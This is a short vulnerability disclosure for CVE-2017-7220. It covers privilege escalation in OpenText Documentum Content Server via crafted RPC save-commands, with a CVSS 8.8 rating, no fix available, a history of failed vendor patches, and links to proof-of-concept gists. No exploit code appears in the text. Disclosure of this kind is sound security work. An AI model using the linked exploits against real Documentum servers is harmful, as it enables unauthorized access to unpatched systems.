CVE-2017-7220. OpenText Documentum Content Server: privilege evaluation using crafted RPC save-commands.

CVE Identifier: CVE-2017-7220
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: 

https://gist.github.com/andreybpanfilov/d8792484e13971982c0719ae59ab8c7c 
https://gist.github.com/andreybpanfilov/e0e60ae9d525a34cca04eb4c89a21e04


Description:

This vulnerability was initially discovered in 2013 and was tracked by CERT/CC as VRF#HUFG9EBA (https://www.kb.cert.org/vuls/id/315340). The vendor made a couple of attempts to remediate the security flaw (see CVE-2014-2514 and http://seclists.org/bugtraq/2015/Aug/111 for a complete description), but all of them were wrong. The issue still persists in all versions of Documentum Content Server.

__
Regards,
Andrey B. Panfilov


